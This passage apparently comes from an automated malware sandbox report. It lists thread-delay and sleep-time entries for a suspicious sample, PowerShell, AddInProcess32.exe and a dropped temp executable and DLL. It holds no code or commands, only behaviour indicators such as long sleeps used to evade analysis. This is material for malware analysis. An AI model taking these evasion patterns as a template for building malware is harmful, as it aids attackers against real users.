                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exe Window / User API: threadDelayed 6622
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exe Window / User API: threadDelayed 409
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6667
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Window / User API: threadDelayed 8505
                  Source: C:\Users\user\AppData\Local\Temp\wfplwfs.exe Window / User API: threadDelayed 9401
                  Source: C:\Users\user\AppData\Local\Temp\wfplwfs.exe Window / User API: threadDelayed 595
                  Source: C:\Windows\System32\conhost.exe Window / User API: threadDelayed 405
                  Source: C:\Users\user\Pictures\kDgMkoNM3lKxwY8D8wOiP15F.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsh1C9B.tmp\INetC.dll
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exe TID: 5432 Thread sleep time: -6456360425798339s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 44572Thread sleep time: -2767011611056431s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 44392Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -11068046444225724s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -600000s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44644Thread sleep count: 8505 > 30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -599859s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -599719s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -599561s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -599430s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -599299s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -599174s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -599031s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -598893s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -598766s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -598620s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -598483s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -598351s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -598222s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44268Thread sleep time: -2700000s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -598084s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -597953s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -597813s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -597637s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -597472s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -597346s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -597203s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -597037s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -596914s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -596800s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -596672s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -596547s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -596406s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -596279s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -596135s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -595922s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -595776s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -595625s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -595495s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -595375s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -595250s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -594920s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -594786s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -594641s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -594406s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -594217s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -593922s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -593469s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -592990s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -592563s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -592250s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -591656s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -591203s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -590125s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -588906s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -588453s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -587906s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -585188s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -584641s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -584063s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -583359s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -582781s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -582250s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -581563s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -581094s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -580531s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -580031s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -579375s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -578844s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -578359s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -577797s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -577109s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -576531s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -576281s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -575797s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -575406s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -575015s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -574734s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -574484s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -574188s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -573904s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -573648s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -573358s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -572941s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -572634s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -572276s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -571901s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -571540s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -571252s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -570621s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -569433s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -567786s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -567430s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -567022s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -566808s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -566377s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -566059s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -565580s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -565013s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -564318s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -563781s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -563375s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -562136s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -561159s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -560511s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -559868s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -559543s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -559278s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -558825s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -558612s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -558271s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -557957s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -557511s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -557172s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -556925s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -556480s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -556177s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -555870s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -555625s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -555435s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -555128s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -554852s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -554123s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -553836s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -553532s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -550943s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -550615s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -550254s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -549815s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -549593s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -549415s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -549082s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -548720s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -548348s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -548105s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -547885s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -547686s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -547497s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -547279s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -547168s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -547042s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -546933s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -546744s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -546608s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -546423s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -546268s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -546085s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -545920s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -545739s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -545568s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -545414s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -545280s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -545163s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -545020s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -544883s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -544717s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -544513s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -544311s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -544190s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -544059s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -543855s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -543693s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -543545s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -543413s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -543228s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -543092s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -542952s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -542810s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -542668s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -542559s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -542427s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -542307s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -542044s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -541732s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -541597s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -541477s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -541334s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -541220s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -541092s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -540945s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -540829s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -540715s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -540601s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -540476s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -540348s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -540224s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -540104s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -539942s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -539804s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -539683s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -539562s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -539445s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -539336s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -539229s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -539114s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -538990s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -538848s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -538726s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -538608s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -538481s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -538355s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -538241s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -538119s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -537996s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -537859s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -537752s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -537638s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -537507s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -537390s >= -30000s
                  Source: C:\Users\user\Pictures\CGZL5y3D81OCbb2NABnHZhPM.exe TID: 44976Thread sleep time: -30000s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\wfplwfs.exe TID: 10968Thread sleep count: 9401 > 30
                  Source: C:\Users\user\AppData\Local\Temp\wfplwfs.exe TID: 10968Thread sleep time: -94010000s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\wfplwfs.exe TID: 10968Thread sleep count: 595 > 30
